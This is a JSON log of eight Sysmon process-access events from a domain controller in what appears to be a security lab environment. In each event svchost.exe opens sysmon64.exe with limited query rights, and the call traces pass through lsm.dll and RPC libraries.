{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1587,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1588,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1589,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1590,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1591,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1592,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1593,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1594,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
